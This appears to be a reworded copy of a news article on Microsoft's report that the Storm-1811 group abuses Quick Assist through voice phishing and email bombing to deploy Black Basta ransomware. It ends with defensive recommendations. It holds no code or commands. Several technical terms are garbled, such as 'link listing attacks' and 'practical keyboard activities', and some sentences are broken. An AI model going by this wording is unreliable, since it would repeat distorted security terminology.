Cybercriminals use Microsoft’s Quick Assist feature in ransomware attacks

May 16, 2024NewsroomRansomware/incident response

The Microsoft Threat Intelligence team said it has observed a threat that it is tracking under that name Storm-1811 Abusing the client management tool Quick Assist to target users for social engineering attacks.

“Storm-1811 is a financially motivated cybercriminal group known to use the Black Basta ransomware,” the company said in a report published on May 15, 2024.

The attack chain includes the use of identity theft through voice phishing to trick unsuspecting victims into installing remote monitoring and management (RMM) tools, followed by the distribution of QakBot, Cobalt Strike and finally Black Basta ransomware.

“Threat actors abuse Quick Assist features to conduct social engineering attacks, for example by impersonating a trusted contact such as Microsoft technical support or an IT professional at the target user’s company to gain initial access to a target device,” said the tech giant.

Quick Assist is a legitimate application from Microsoft that allows users to share their Windows or macOS device with another person via a remote connection, primarily with the intention of troubleshooting technical issues on their systems. It is installed by default on devices running Windows 11.

To make the attacks more convincing, the threat actors launch link listing attacks, a type of email bombing attack in which the targeted email addresses are signed up to various legitimate email subscription services in order to fill their inboxes with subscribed content to flood.

The attacker then impersonates the company’s IT support team by calling the target user and pretending to offer help in fixing the spam issue and giving them access to their device via Quick Assist.

“Once the user allows access and control, the threat actor executes a scripted cURL command to download a series of batch files or ZIP files that are used to deliver malicious payloads,” the Windows maker said.

“Storm-1811 leverages their access and performs other practical keyboard activities such as domain enumeration and lateral movement. Storm-1811 then uses PsExec to deploy Black Basta ransomware across the network.”

Microsoft said it is taking a close look at the misuse of Quick Assist in these attacks and is working to integrate alerts into the software to notify users of possible tech support scams that could facilitate the spread of ransomware.

The campaign, believed to have begun in mid-April 2024, targets a wide range of industries and sectors, including manufacturing, construction, food and beverage, and transportation, Rapid7 said, noting the opportunistic nature of the attacks.

“The low barrier to entry to carrying out these attacks, coupled with the significant impact these attacks have on their victims, continues to make ransomware a very effective means to an end for threat actors looking to make a profit,” said Robert Knapp , senior manager of incident response services at Rapid7, said in a statement shared with The Hacker News.

Microsoft has also described Black Basta as a “closed ransomware offering,” as opposed to a ransomware-as-a-service (RaaS) operation that includes a network of core developers, partners and first-access facilitators that carry out ransomware and extortion attacks.

It is “spread by a small number of threat actors who typically rely on other threat actors for initial access, malicious infrastructure and malware development,” the company said.

“Since Black Basta first emerged in April 2022, Black Basta attackers have deployed the ransomware after gaining access from QakBot and other malware distributors.

Organizations are recommended to block or uninstall Quick Assist and similar remote monitoring and management tools when not in use, and to train employees to recognize tech support scams.